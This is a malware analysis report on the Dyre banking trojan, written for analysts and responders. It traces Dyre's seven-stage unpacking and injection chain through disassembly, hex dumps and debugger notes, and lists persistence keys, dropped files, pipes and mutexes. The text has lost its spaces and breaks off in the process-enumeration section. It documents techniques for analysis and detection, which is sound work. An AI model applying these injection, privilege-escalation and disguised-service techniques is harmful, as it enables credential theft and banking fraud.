Dyre Analysis

DyreInfectionAnalysisbyAlexanderHanel
2014/11/24
Version1.0
alexander.hanel@gmail.com

ExecutiveSummary
Introduction
FamilyName
Propagation
SampleAnalyzed
Installation
Stage1
stage2
Stage3
Stage4
Stage5
Stage6
Stage7
GeneralDetailsandFunctionality
Persistence
Registry
Service
RunKey
DroppedFiles
Service
Pipes
Mutex
FunctionalityOverview
Enumeratingprocesses
ProcessInjection
HostIPRetrieval
VNC
Commands&Configurations
Commands&Configurations
ErrorCodes
Hooks
FireFoxHooks
InternetExplorerHooks
ChromeHooks
AntiDetectionfunctionality
DisablingRapportGP
CommandandControl
ThirdPartyResources
URLs&IPs
NetworkTrafficPatterns
Appendix:
Strings
Stage6Dyre
Stage7InjectedProcess
ThirdPartyAnalysis
Executive Summary
ThisdocumentisananalysisoftheDyrebankingmalware.Itisintendedtoaidin
understandinghowDyreexecutesandinteractwiththeoperatingsystem.Thetargeted
audienceismalwareanalyst,reverseengineers,systemadministrators,incidentresponders
andforensicinvestigators.Hopefullyanindividualinvestigatinganincidentcouldusethis
documenttodetermineiftheinfectionisDyreornot.
Introduction
DyreisbankingtrojanthatfirstwasfirstseeninJuneof2014.Intermsofbankingmalware
thefamilyisratherrecent.Mostorganizationsandemailprovidershavebeenhitwithaspam
campaignsthateitherlinkstoanexploitkitthatdropsDryeorhavebeensentanemailwitha
zipattachmentthatcontainsaDyreexecutable.ThisdocumentcoverfeaturesoftheDyre
thatIfoundinteresting.Duetothesizeofthecodenotallfeaturesarecovered.ThesampleI
originallystartedwithwasanoldersample.Newersamplesthatdroppedaservicecrashedin
mytestenvironment.Ifyouwouldliketocontributetothisreportpleaseshootmeanemail.
Family Name
Dyre
Dyreza
Dyzap
Battdil
Propagation
DyreisusuallydownloadedbyalightweighttrojandownloadernamedUpatre.Thetwo
familiessharethesamepacker/obfuscation.Asofthetimeofthiswriting,Upatreismost
commonlyexecutedbyusersbeingsocialengineeredtoopenazipfileandexecuteit.The
userswillreceiveanemailmasqueradingtobefromofaknownentitysuchasWellsFargo,
IRS,Amazon,etc.Theemailwillrequesttheusertoopentheattachment.Onceopenedit
willdownloadDyre.
Sample Analyzed
FileHash
099c36d73cad5f13ec1a89d5958486060977930b8e4d541e4a2f7d92e104cd21
FileSize
440kB
FileModificationDate/Time2014:09:2022:28:0004:00
FileAccessDate/Time
2014:11:1117:28:1605:00
FileCreationDate/Time 2014:11:1117:25:4305:00
FileType
Win32EXE
MIMEType
application/octetstream
MachineType
Intel386orlater,andcompatibles
TimeStamp
2014:08:1408:46:2204:00
PEType
PE32
LinkerVersion
6.2
CodeSize
376832
InitializedDataSize
73728
UninitializedDataSize
0
EntryPoint
0x3eec3
OSVersion
4.0
ImageVersion
0.0
SubsystemVersion
4.0
Subsystem
WindowsGUI
FileVersionNumber
2.4.0.8376
ProductVersionNumber2.4.0.8376
FileFlagsMask
0x0000
FileFlags
(none)
FileOS
WindowsNT32bit
ObjectFileType
Executableapplication
FileSubtype
0
LanguageCode
English(U.S.)
CharacterSet
Windows,Latin1
FileDescription
ViewerPDF
FileVersion
2.4.0.8376
LegalCopyright
Copyright20062013allauthors(GPLv3)
OriginalFilename
ViewerPDF.exe
ProductName
ViewerPDF
ProductVersion
2.4.0.8376
Installation
Dyreexecutesinsevenstages.Inordertounderstandtheinstallationprocessitisusefulto
knowthedifferentstages.Byknowingthesestagesitcanaidindetection.
StagesDescription
1. Executableondisk,nonexecuted.
2. Thesampleisloadedinmemory,executingandmodifyingitsownmemory.
3. PositionindependentcoderunninginallocatedmemorytodecodeoriginalDyre
installer.
4. Dyreinstaller.
5. Positionindependentcodeinjectedintosvchost.exeorexplorer.
6. DryeinjectedDLLrunninginsvchost.exeorexplorer.**
7. InjectedDLLrunninginbrowsermemoryspace.**
**TheDLLwillnotshowupasaloadedmodule.
Note:Thebelowstageswerebasedoffofonevariant.Detailssuchasfolderpaths,filenames
orinjectedprocessesvary.TheGeneralDetailsandFunctionalitysectioniswrittentocover
moreindicatorsofthedifferentvariants.
Stage 1
AspreviouslymentionedUpatreandDyresharethesameobfuscationtool.Inthisstagethe
samplesareverysimilarexceptforacoupleofdifferences.Themostnotabledifferencesis
theimport.BelowistheimportsforUpatre.MostoftheMSVCRTAPIsareinvokedduringthe
WinMain.
Note:Partsofthiscanbealittleesotericandmaybeonlyinterestingtomyselfand/orotherswholiketounderstandi
filerandomization.
AddressOrdinalName
Library
00403000
SetBkColor
GDI32
00403008
GetStartupInfoAKERNEL32
0040300C
GetModuleHandleAKERNEL32
00403010
GetModuleHandleWKERNEL32
00403014
CloseHandle
KERNEL32
00403018
CreateFileW
KERNEL32
0040301C
WriteFile
KERNEL32
00403020
ReadFile
KERNEL32
00403028
__getmainargs MSVCRT
0040302C
_controlfp
MSVCRT
00403030
_except_handler3MSVCRT
00403034
__set_app_typeMSVCRT
00403038
__p__fmode
MSVCRT
0040303C
__p__commode MSVCRT
00403040
_adjust_fdiv
MSVCRT
00403044
__setusermatherrMSVCRT
00403048
_exit
MSVCRT
0040304C
_XcptFilter
MSVCRT
00403050
exit
MSVCRT
00403054
_acmdln
MSVCRT
00403058
_initterm
MSVCRT
00403060
RegisterClassExWUSER32
00403064
CreateWindowExWUSER32
00403068
GetMessageW USER32
0040306C
TranslateMessageUSER32
00403070
DispatchMessageWUSER32
00403074
DefWindowProcWUSER32
00403078
PostQuitMessageUSER32
0040307C
ShowWindow
USER32
00403080
UpdateWindow USER32
00403084
SetWindowTextWUSER32
00403088
PostMessageW USER32
IfyouhavereadmyUpatreSampleSetAnalysisanumberoftheseAPIswilllookfamiliar.
GetModuleHandleA,GetStartupInfoA,EnableWindow,etc.
AddressOrdinalNameLibrary
0045D000
GetModuleHandleA
KERNEL32
0045D004
GetStartupInfoA
KERNEL32
0045D2F86336 __imp_?UpdateFrameCounts@CDocument@@UAEXXZMFC42
0045D05C5577 __imp_?ReleaseFile@CDocument@@UAEXPAVCFile@@H@ZMFC42
...............................
0045D0785241 ?PostNcDestroy@CWnd@@MAEXXZMFC42
0045D0744396 __imp_?OnChildNotify@CButton@@MAEHIIJPAJ@ZMFC42
0045D0DC4108 __imp_?IsSelected@CView@@UBEHPBVCObject@@@ZMFC42
0045D06C4242 ?messageMap@CFrameWnd@@1UAFX_MSGMAP@@BMFC42
0045D0681842 ?classCFrameWnd@CFrameWnd@@2UCRuntimeClass@@BMFC42
0045D0645740 __imp_?SaveModified@CDocument@@UAEHXZMFC42
........
0045D354
_setmbcp
MSVCRT
0045D350
??2@YAPAXI@Z
MSVCRT
.....
0045D310
_except_handler3
MSVCRT
0045D30C
_controlfp
MSVCRT
0045D368
EnableWindow
USER32
0045D364
SendMessageA
USER32
0045D360
UpdateWindow
USER32
0045D35C
LoadCursorA
USER32
OnenoticeabledifferencebetweenthetwosetsisthattheMicrosoftFoundationClassLibrary
hasbeenincluded.MostoftheAPIsfromthelibraryarenevercalled.Thepurposeof
importingtheAPIsistoaddmoredataandcodetoaidinaddingdatatohelprandomizethe
executablefromhashing.ThisisagoodexampleofwhyrelyingonhashingofAPIsisnot
alwaysagoodideaforclusteringfamilies.TheauthorsoftheobfuscationtoolusedbyUpatre
andDyrehaveaddedslightvariationsthroughpointerarithmetictorandomizethecode.
Upatre
.text:0040106F_GetImageOptionalHeaderAddressprocnear
.text:0040106F
mov ecx,[eax+3Ch]
note:0x3C
.text:00401072
mov [ebp4],eax
.text:00401075
and ecx,0FFFFh
.text:0040107B
add eax,ecx
.text:0040107D
mov ecx,18h
.text:00401082
add eax,ecx
.text:00401084
inc
ecx
.text:00401085
add ecx,0F0h
.text:0040108B
retn
.text:0040108B_GetImageOptionalHeaderAddressendp
Drye
.text:004469B0_GetImageOptionalHeaderAddressprocnear
.text:004469B0
.text:004469B0
mov [ebp4],eax
.text:004469B3
xor
ecx,ecx
.text:004469B5
inc
eaxinceaxso[EAX+3Bh]equals[EAX+0x3C]
.text:004469B6
mov cx,[eax+3Bh]
.text:004469BA
add eax,ecx
.text:004469BC
dec eax
.text:004469BD
mov ecx,18h
.text:004469C2
add eax,ecx
.text:004469C4
inc
ecx
.text:004469C5
add ecx,0F0h
.text:004469CB
retn
.text:004469CB_GetImageOptionalHeaderAddressendp
stage 2
.text:0044F240sub_44F240
procnear
CODEXREF:
.text:0044F240
push ebp
count:1
.text:0044F241
mov ebp,esp
count:1
.text:0044F243
push offset_call_decodercount:1
.text:0044F248
call
_atexit
count:1
.text:0044F24D
add esp,4
count:1
.text:0044F250
pop ebp
count:1
.text:0044F251
retn
count:1
.text:0044F251sub_44F240
endp
Stage2happensafteracallto_atexit.ThisstagewillcallVirtualProtectanddecodestage3.
Callingthe_atexitfunctiondirectlywillnotworkbecausethesamplereliesonpredicted
valuesgeneratedbycallinguselessAPIs.T
InvokedduringWinMain
.text:00401380
mov [ebp34h],eax
.text:00401383
mov ecx,[ebp0ACh]
.text:00401389
call
?GetExStyle@CWnd@@QBEKXZ
CWnd::GetExStyle(void)Retrievestheextendedwindowstylesofthewindow.
.text:0040138E
mov dword_46C1CC,eax
eax=0x100
WS_EX_WINDOWEDGE
Invokedafter_atexit
.text:0043EC95
mov eax,dword_46C1CC
.text:0043EC9A
sub eax,0F9h
0x1000xf9=7
.text:0043EC9F
call
_thread

.text:0044A790_thread
procnear
CODEXREF:
.text:0044A790
mov ecx,eax
eax=7
.text:0044A792
sub ecx,7
.text:0044A795
test
ecx,ecx
ecx=0
.text:0044A797
jz
shortloc_44A7B5
.text:0044A799
inc
ecx
.text:0044A79A
retn
.text:0044A79A
.text:0044A79B
db6Ah
.text:0044A79C
.text:0044A79C
jmp fwordptr[eax+19h]
.text:0044A79C
.text:0044A79F
db77h
.text:0044A7A0
dd0A1640052h,0
.text:0044A7A8
dd25896450h,0
.text:0044A7B0
dd68685351h
.text:0044A7B4
db0D1h
.text:0044A7B5
.text:0044A7B5
.text:0044A7B5loc_44A7B5:
CODEXREF:_thread+7j
.text:0044A7B5
mov ebp,esp
.text:0044A7B7
mov dword_465FE4,esp
.text:0044A7BD
.text:0044A7BDloc_44A7BD:
CODEXREF:_thread+45j
.text:0044A7BD
push eax
.text:0044A7BE
mov eax,offsetGetStartupInfoA
.text:0044A7C3
mov edx,offsetloc_43EB90
.text:0044A7C8
mov eax,[eax]
.text:0044A7CA
mov dword_465FF0,eax
.text:0044A7CF
pop eax
.text:0044A7D0
add edx,eax
.text:0044A7D2
push edx
0043EB97
.text:0044A7D3
test
eax,eax
.text:0044A7D5
jz
shortloc_44A7BD
.text:0044A7D7
call
dwordptr[ebp4]0043EB97
...
.text:0043EB97_init_decodeprocnear
.text:0043EB97
mov ecx,eax
.text:0043EB99
push ecx
.text:0043EB9A
inc
ecx
.text:0043EB9B
cmp ecx,0Ah
.text:0043EB9E
jz
sub_4469B0
.text:0043EBA4
call
sub_4110F0
.text:0043EBA9
mov ecx,42h
.text:0043EBAE
push offsetunk_46B194
.text:0043EBB3
lea
esi,dword_43F030
.text:0043EBB9
dec ecx
.text:0043EBBA
dec ecx
.text:0043EBBB
push ecx
.text:0043EBBC
mov edx,offset_2ndStage
.text:0043EBC1
push edi
.text:0043EBC2
push edx
.text:0043EBC3
jmp shortloc_43EBDEVirtualProtect
.text:0043EBC5
.text:0043EBC5
.text:0043EBC5loc_43EBC5:
CODEXREF:_init_decode+49j
.text:0043EBC5
mov ecx,127
XORLoopCount
.text:0043EBCA
mov edi,offset_2ndStage Buffertodecode
.text:0043EBCF
inc
ecx
.text:0043EBD0
mov eax,dword_465EA2
.text:0043EBD5
call
_decode_0
.text:0043EBDA
pop eax
.text:0043EBDB
inc
eax
.text:0043EBDC
inc
eax
.text:0043EBDD
retn
.text:0043EBDE
.text:0043EBDE
.text:0043EBDEloc_43EBDE:
CODEXREF:_init_decode+2Cj
.text:0043EBDE
call
eax
VirtualProtect
.text:0043EBE0
jmp shortloc_43EBC5
.text:0043EBE0_init_decode
endp
.text:00442430_xor_save procnear
CODEXREF:decode+6p
.text:00442430
mov eax,esi
.text:00442432
mov eax,[eax]
.text:00442434
xor
eax,ecx
.text:00442436
call
save_xored
.text:0044243B
retn
.text:0044243B_xor_save endp
RENotes:TobypassthesestagessetabreakpointonVirtualProtectEx,execute,thena
hardwarebreakpointontheaddress/secondargumentinVirtualProtect,thenexecute.The
secondstageisresponsibleforallocatingmemory,decodingabufferusingthesameXOR
routineandwritingthethirdstagetoamemory.Settingabreakpointatthelastcalleaxwill
takeustothethirdstage.Seethebelowassembly

0041F620
0041F621
0041F623
0041F626
0041F629
0041F62C
0041F62F
0041F630
0041F633
0041F636
0041F637
0041F63A
0041F63C
0041F63F
0041F642
0041F645
0041F646
0041F649
0041F64B
0041F64D
0041F652
0041F653
0041F654
0041F657
0041F659
0041F65B
0041F65D
0041F660
0041F663
0041F666
0041F667
0041F66A
0041F66C
0041F66F
0041F672
0041F674
0041F675
0041F676
0041F677
0041F678
0041F679
55
PUSHEBP
8BEC
MOVEBP,ESP
83C4F4
ADDESP,0C
8945F4
MOVDWORDPTRSS:[EBPC],EAX
8B5D08
MOVEBX,DWORDPTRSS:[EBP+8]
8B4304
MOVEAX,DWORDPTRDS:[EBX+4]
50
PUSHEAX
laddofstrVirtualAlloc
8B5320
MOVEDX,DWORDPTRDS:[EBX+20]
8B4210
MOVEAX,DWORDPTRDS:[EDX+10]
50
PUSHEAX
8B4208
MOVEAX,DWORDPTRDS:[EDX+8]
FFD0
CALLEAX
00417C60getimportaddress
8945F8
MOVDWORDPTRSS:[EBP8],EAX
8B4B0C
MOVECX,DWORDPTRDS:[EBX+C]
C1E90C
SHRECX,0C
41
INCECX
C1E10C
SHLECX,0C
33C0
XOREAX,EAX
6A40
PUSH40
6800100000 PUSH1000
51
PUSHECX
50
PUSHEAX
8B45F8
MOVEAX,DWORDPTRSS:[EBP8]
FFD0
CALLEAX
VirtualAlloc
85C0
TESTEAX,EAX
743F
JESHORTx.0041F69C
8945FC
8B7DFC
MOVEDI,DWORDPTRSS:[EBP4]
8B5314
53
PUSHEBX
8B5B10
MOVEBX,DWORDPTRDS:[EBX+10]
8B33
MOVESI,DWORDPTRDS:[EBX]
0FB70A
MOVZXECX,WORDPTRDS:[EDX]
83F900
CMPECX,0
740A
JESHORTx.0041F67E
43
INCEBX
43
INCEBX
43
INCEBX
43
INCEBX
42
INCEDX
42
INCEDX
0041F67A
F3:A4
datatoheap
0041F67C^EBEC
0041F67E
5B
0041F67F
8B7DFC
0041F682
8B7318
0041F685
8B431C
0041F688
8B4B0C
0041F68B
8B5308
0041F68E
FFD2
0041F690
8B4B20
0041F693
8B45FC
0041F696
0345F4
0041F699
51
0041F69A
FFD0
0041F69C
8BE5
0041F69E
5D
0041F69F
C3
REPMOVSBYTEPTRES:[EDI],BYTEPTRDS:[ESI]Copy
JMPSHORTx.0041F66A
POPEBX
MOVEDI,DWORDPTRSS:[EBP4]
MOVESI,DWORDPTRDS:[EBX+18]
MOVEAX,DWORDPTRDS:[EBX+1C]
MOVECX,DWORDPTRDS:[EBX+C]
CALLEDX
<decodebuffer
MOVECX,DWORDPTRDS:[EBX+20]
ADDEAX,DWORDPTRSS:[EBPC]
PUSHECX
CALLEAX
<BreakPointStageThree
MOVESP,EBP
POPEBP
RETN
Stage 3
ThethirdstagetypicallystartswiththeGetEIPtrick.
seg000:009D0009
call
$+5
seg000:009D000E
pop ebx
seg000:009D000F
add ebx,6
seg000:009D0012
jmp shortsub_9D0083
seg000:009D0012
seg000:009D0014aLoadlibraryadb'LoadLibraryA',0
seg000:009D0021aGetprocaddressdb'GetProcAddress',0
seg000:009D0030
db
1
seg000:009D0031aKernel32_dlldb'kernel32.dll',0
seg000:009D003EaVirtualallocdb'VirtualAlloc',0
seg000:009D004BaVirtualprotectdb'VirtualProtect',0
seg000:009D005AaVirtualfree
db'VirtualFree',0
seg000:009D0066aUnmapviewoffildb'UnmapViewOfFile',0
seg000:009D0076aExitprocess
db'ExitProcess',0
seg000:009D0082
db
2
Thisstageisresponsiblefordecodinganembeddedexecutablefileandthenoverwritingthe
originalexecutablesmemory.ItwillcallUnmapViewOfFiletoremovetheoriginalloaded
executablefrommemory,allocateandwritememoryforeachsectionoftheexecutable,
rebuildtheimporttable,changethememorywritesandthenfreethememory.Oncethis
completeditwilljumptothenextstage.
RENotes:AneasywaytocarveouttheexecutableissetabreakpointonUnmapViewOfFile,
execute,thesetabreakpointonVirtualFree,executethendumpthememorythatisbeing
freed.
Stage 4
ThefourthstageistheDyreDropper.Theentrypointwilllooksomethinglikethis.NoticeEIP
pointstoanareaofmemoryastheoriginalbaseaddress.
.text:004025D0
push ebp
.text:004025D1
mov ebp,esp
.text:004025D3
and esp,0FFFFFFF8h
.text:004025D6
sub esp,5D4h
.text:004025DC
push ebx
.text:004025DD
push esi
.text:004025DE
push edi
.text:004025DF
push 168h
nSize
.text:004025E4
lea
eax,[esp+5E4h+Data]
.text:004025EB
push eax
lpFilename
.text:004025EC
push 0
hModule
.text:004025EE
call
ds:GetModuleFileNameW
.text:004025F4
cmp hHeap,0
.text:004025FB
jnz
shortloc_402618
.text:004025FD
push 0
dwMaximumSize
.text:004025FF
push 400000h
dwInitialSize
.text:00402604
push 40000h
flOptions
.text:00402609
call
ds:HeapCreate
.text:0040260F
mov hHeap,eax
.text:00402614
test
eax,eax
Note:Thebelowprocessvariesbetweenversions.SeetheDroppedFilessectionfor
variationsondroppedfiles.
ThesamplewillcheckthatitisrunningintheApplicationDatafolderbycalling
SHGetFolderPathCSIDL_APPDATA.IfthesampleisrunningonWindowsVistaorlateritwill
berunningfrom%USERPROFILE%\AppData\RoamingiflowerthanVista
%USERPROFILE%\ApplicationData.Ifthesampleisnotrunningin%APPDATA%itwill
generatearandom15charstringandconcatenatewith".exe"
DDoKxGmEEQspft.exe
QLysiyFCqsHTenS.exe
rJSyaumrkjfVcxY.exe
wHepYHNuahJReRa.exe
XMoVNxUrnyNxMnH.exe
yDDoKxGmEEQspft.exe
Itwillthenwriteitselfto%APPDATA%andexecuteitwithit'sfilepathasanargument.Ifthe
sampleisalreadyrunningfrom%APPDATA%itwillcreateamutextoseeifonlyoneinstance
isexecuting.
.text:004026E8
push offsetaGlobal553wwerd"Global\\553wwerdty7"
.text:004026ED
push 0
bInheritHandle
.text:004026EF
push 100000h
dwDesiredAccess
.text:004026F4
call
ds:OpenMutexW
Ifthesampleisexecutingforthefirsttimeitwilldeletethepreviouslyrunexecutable.The
samplewillthencreatearunkey.
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
@="C:\\DocumentsandSettings\\Administrator\\ApplicationData\\XMoVNxUrnyNxMnH.exe"
Creatingrulestodetectthecreationofautorunregistrykeysthatpointtofilesin
%APPDATA%isaneasywaytoidentifysuspiciousexecutablesfromaHIPSorWindows
eventsperspective.
AftertheregistrykeyiswrittenthesamplewillcallIsWow64Processtoidentifyifitisrunning
ona64bitsystem.Itwillthencreateafilemappingofaresourceandadjustit'sprivilegesto
"SeDebugPrivilege".OncecompleteditwillcallCreateToolhelp32Snapshottosearchfor
"svchost.exe".IftheprocessisrunningasNTAUTHORITY\SYSTEMitwillinjectintothe
process.
.text:00401388
push eax
pSid
.text:00401389
push ebx
DomainSid
.text:0040138A
push WinLocalSystemSid WellKnownSidType
.text:0040138C
mov [ebp+cbSid],44h
.text:00401393
call
ds:CreateWellKnownSidfunctioncreatesaSIDforpredefined
aliases.
....
.text:004013AA
push ecx
ReturnLength
.text:004013AB
push ebx
TokenInformationLength
.text:004013AC
push ebx
TokenInformation
.text:004013AD
push 1
TokenInformationClass
.text:004013AF
push edx
TokenHandle
.text:004013B0
mov [ebp+ReturnLength],ebx
.text:004013B3
call
ediGetTokenInformation
.text:004013B5
call
ds:GetLastError
.text:004013BB
cmp eax,ERROR_INSUFFICIENT_BUFFER
....
.text:004013F1
lea
edx,[ebp+pSid]
.text:004013F4
push edx
pSid2
.text:004013F5
push eax
pSid1
.text:004013F6
call
ds:EqualSid
Oncetheprocessisinjecteditwillopenthemutexitcreatedearlier.Oncethisstageis
completeditwillcallExitProcess.
Stage 5
Theentrypointoftheinjectedprocessisnottheentrypointoftheexecutablebutthebase
addressoftheallocatedmemory.Thefirst0x640bytesofthememoryblockcontainsposition
independentcodethatisresponsibleforloadingandrebuildingtheimporttableforan
executablethatfollowsthecode.Thisapproachisnotablebecauseanyexecutablefilecanbe
injectedintoaprocess.Theembeddedexecutabledoesnotneedtotobemodifiedtoinclude
positionindependentcodefunctionality.
Offset(h)000102030405060708090A0B0C0D0E0F
000000005589E557565152538B7508E8EA010000UWVQRSu....
0000001089C38D46615053E8D0020000558D6E51.FaPS...U.nQ
00000020894504895D008D86470600008945088BE.]..G...E.
00000030864306000089450CE8470100008D8687C...E.G....
00000040030000FFD05D31C05B5A595E5FC9C20C...]1[ZY^_.
0000005000000000000000000000000000000000................
000000600047657450726F634164647265737300.GetProcAddress.
seg000:0092000055
push ebp
seg000:0092000189E5
mov ebp,esp
seg000:0092000357
push edi
seg000:0092000456
push esi
seg000:0092000551
push ecx
seg000:0092000652
push edx
seg000:0092000753
push ebx
seg000:009200088B7508
mov esi,[ebp+arg_0]
seg000:0092000BE8EA010000
call
GetKernelBase
seg000:0092001089C3
mov ebx,eax
seg000:009200128D4661
lea
eax,[esi+61h]
seg000:0092001550
push eax
"GetProcAddress"
seg000:0092001653
push ebx
seg000:00920017
seg000:00920017
loc_920017:
seg000:00920017E8D0020000
call
_IAT_Lookup
seg000:0092001C55
push ebp
seg000:0092001D8D6E51
lea
ebp,[esi+51h]
seg000:00920020894504
mov [ebp+4],eax
seg000:00920023895D00
mov [ebp+var_s0],ebx
seg000:009200268D86470600+
lea
eax,[esi+647h]
MZHeader
ThememoryoftheinjectedprocesscanbeidentifiedbytheRWXrights.
Private(Commit),0x630000,124kB,RWX
LoaderCode
Mapped(Commit),0xf00000,104kB,RWX
DLL
Private(Commit),0x2410000,3.48MB,RWXDATA
Private(Commit),0x2792000,504kB,RWX
DATA
Stage 6
Theloadedexecutablewillnotcontainthepositionindependentcode.Itwillstartwiththe
standardMZ.
Offset(h)000102030405060708090A0B0C0D0E0F
000000004D5A90000300000004000000FFFF0000MZ............
00000010B8000000000000004000000000000000.......@.......
0000002000000000000000000000000000000000................
00000030000000000000000000000000D8000000...............
000000400E1FBA0E00B409CD21B8014CCD215468.....!.L!Th
0000005069732070726F6772616D2063616E6E6Fisprogramcanno
00000060742062652072756E20696E20444F5320tberuninDOS
000000706D6F64652E0D0D0A2400000000000000mode....$.......
0000008008EE31684C8F5F3B4C8F5F3B4C8F5F3B.1hL._L._L._
0000009045F7CC3B598F5F3B4C8F5E3B8D8F5F3BEY._L.^.._
000000A023F9F03B648F5F3B23F9C13B4D8F5F3B#d._#M._
000000B023F9C23B4D8F5F3B526963684C8F5F3B#M._RichL._
000000C000000000000000000000000000000000................
Note:TheC2canbeparsedoutofDATAmemory.
Checksifahardcodedmutexstringispresenttodetermineifitisalreadyrunning.Themutex
stringisavariationofauthorpressingrandomcharsonthekeyboardswiththeirlefthand
"Global\\553wwerdty7".Anexampleofthiscanbeseeninthenameofthelogfile
"d6r5g4da.db"andnamedRCDATA(rawdataresources)"u1xdfy2dv".Thenamedresources
areusedtostoretheinitialconfigfileandinjectedcode.
Createsaconfigurationfilein%APPDATA%directory
Offset(h)000102030405060708090A0B0C0D0E0F
000000000500626F746964390000005553455235..botid9...USER5
00000010344B392D3344384636415F57353132364K93D8F6A_W5126
0000002030302E4244363246463938304535383000.BD62FF980E580
000000303734363733413839454131464138343574673A89EA1FA845
0000004046433800500271A88BBDA05E0456F260FC8.P.q^.V`
0000005003E3E4255076366F97A4D7068818F67C.%Pv6o..|
00000060E22F1BF8
/.
AdjusttokentohaveSeDebugPrivilege.
.text:10004646
call
ds:GetCurrentProcess
.text:1000464C
push eax
ProcessHandle
.text:1000464D
call
ds:OpenProcessToken
.text:10004653
test
eax,eax
.text:10004655
jz
shortloc_10004696
.text:10004657
lea
eax,[ebp+NewState.Privileges]
.text:1000465A
push eax
lpLuid
.text:1000465B
push offsetaSedebugprivile"SeDebugPrivilege"
.text:10004660
push esi
lpSystemName
.text:10004661
mov [ebp+NewState.PrivilegeCount],1
.text:10004668
call
ds:LookupPrivilegeValueW
.text:1000466E
test
eax,eax
.text:10004670
jz
shortloc_1000468D
.text:10004672
push esi
ReturnLength
.text:10004673
push esi
PreviousState
.text:10004674
push 10h
BufferLength
.text:10004676
lea
eax,[ebp+NewState]
.text:10004679
push eax
NewState
.text:1000467A
push esi
DisableAllPrivileges
.text:1000467B
push [ebp+hObject]TokenHandle
.text:1000467E
mov [ebp+NewState.Privileges.Attributes],2
.text:10004685
call
ds:AdjustTokenPrivileges

Stage 7
ThelaststageistheDLLinjectedintoabrowsersuchasiexplore.exe,firefox.exeor
chrome.exe.ThisstagewillonlyhavebeenreachedifDyrehasbeenconnectedtothe
internet.TheinjectedDLLcontains170+functions.Thefunctionsrangefromcreatinghooks
inthebrowsers(seeHooks)tomonitortraffic,communicationwiththemainDyreexecutable
vianamepipes,reroutingtraffic,etc.Theinjectedmemorywouldhavethebelow
characteristics.
Private(Commit),0xa00000,96kB,RWX+G
General Details and Functionality

Persistence
Dyreusestheregistrytosurviveareboot.
Registry
Service
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\googleupdate
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\googleupdateType
dword:00000010
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\googleupdateStart
dword:00000002
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\googleupdateErrorControl
dword:00000001
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\googleupdateImagePath
hex(2):43,3a,5c,57,49,4e,44,4f,57,53,5c,43,48,55,6e,46,61,57,4c,67,66,4a,54,42,64,77,2e,65,
78,65,00,
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\googleupdate
DisplayName"GoogleUpdateService"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\googleupdateObjectName
"LocalSystem"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\googleupdate\Security
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\googleupdate\Security
Security
hex:01,00,14,80,90,00,00,00,9c,00,00,00,14,00,00,00,30,00,00,00,02,00,1c,00,01,00,00,00,0
2,80,14,00,ff,01,0f,00,01,01,00,00,00,00,00,01,00,00,00,00,02,00,60,00,04,00,00,00,00,00,14
,00,fd,01,02,00,01,01,00,00,00,00,00,05,12,00,00,00,00,00,18,00,ff,01,0f,00,01,02,00,00,00,0
0,00,05,20,00,00,00,20,02,00,00,00,00,14,00,8d,01,02,00,01,01,00,00,00,00,00,05,0b,00,00,
00,00,00,18,00,fd,01,02,00,01,02,00,00,00,00,00,05,20,00,00,00,23,02,00,00,01,01,00,00,00,
00,00,05,12,00,00,00,01,01,00,00,00,00,00,05,12,00,00,00,
Run Key
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunGoogleUpdate
"C:\DocumentsandSettings\Administrator\ApplicationData\googleupdaterr.exe"
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run@
"C:\DocumentsandSettings\Administrator\ApplicationData\EDPBxttMFiiCodB.exe"
Dropped Files
Service
WindowsXP
C:\WINDOWS\38f4f489bd7.INI1KB
C:\WINDOWS\CHUnFaWLgfJTBdw.exe439KB**
C:\WINDOWS\CHUnFaWLgfJTBdw.INI1KB
C:\WINDOWS\system32\config\systemprofile\ApplicationData\2ete64.vas2KB
**Theexecutablewiththe15randomupperorlowercasecharsisthemostcommon.
XRiderVersionWindowsXP
C:\DocumentsandSettings\Administrator\ApplicationData\cmd.exe
291KB
C:\DocumentsandSettings\Administrator\ApplicationData\userdata.dat
1KB
diper89VersionWindowsXP
C:\DocumentsandSettings\Administrator\ApplicationData\googleupdaterr.exe257KB
C:\DocumentsandSettings\Administrator\ApplicationData\userdata.dat1KB
C:\DocumentsandSettings\Administrator\ApplicationData\EDPBxttMFiiCodB.exe451KB
C:\WINDOWS\system32\config\systemprofile\ApplicationData\d6r5g4da.db1KB
C:\WINDOWS\<DROPPERNAME>.INI1KB
Pipes
Theinjectedprocesscommunicatestothemainprocessbyusingnamedpipes.Thenames
arehardcodedsimilartothemutexes.Thepipeiscreatedinstage6.
seg000:00A05044
push 0
seg000:00A05046
push 0
seg000:00A05048
push 3
seg000:00A0504A
push 0
seg000:00A0504C
push 0
seg000:00A0504E
push 0C0000000h
seg000:00A05053
push offseta_PipeCmvn5e4d4"\\\\.\\pipe\\cmvn5e4d4r"
seg000:00A05058
call
ebxCreateFileW
seg000:00A0505A
mov esi,eax

Itusesthenamepipetopasscommandandvariablesbackandfourth.Withintheinjected
processthereareanumberofdifferentrequestedvariables"btid","ccsr","btnt","slip",
"newp","slpr"and"ppsr".
\\.\pipe\Xider78Pipe
\\.\\pipe\\cmvn5e4d4r
\\.\pipe\Diper89Pipe
\\.\pipe\net\NtControlPipe10(
Mutex
Themutexesarehardcodedandaregeneratedduringstage6.Thebelowmutexeswere
foundviaOSINT.
Global\1g2hk1hyj
Global\\553wwerdty7
Global\cdv5b74f5y7
Xider78
Diper89
Functionality Overview
ThissectioncontainsgenericfunctionalitythatDyreiscapableof.Thereisroomfor
improvementinregardstothenetworking.
Enumerating processes
CallsCreateToolhelp32Snapshottogetasnapshotofallrunningprocesses.Foreach
processnameitcallsStrStrIWtoseeifthesearchedprocessmatches.Ifnot,itwillcall
Process32NextWtogetthenextprocessname.Instage4explorer.exeorsvchost.exeis
searchedfor.Instage6theinjectedprocesssearchesforchrome.exe,firefox.exeandor
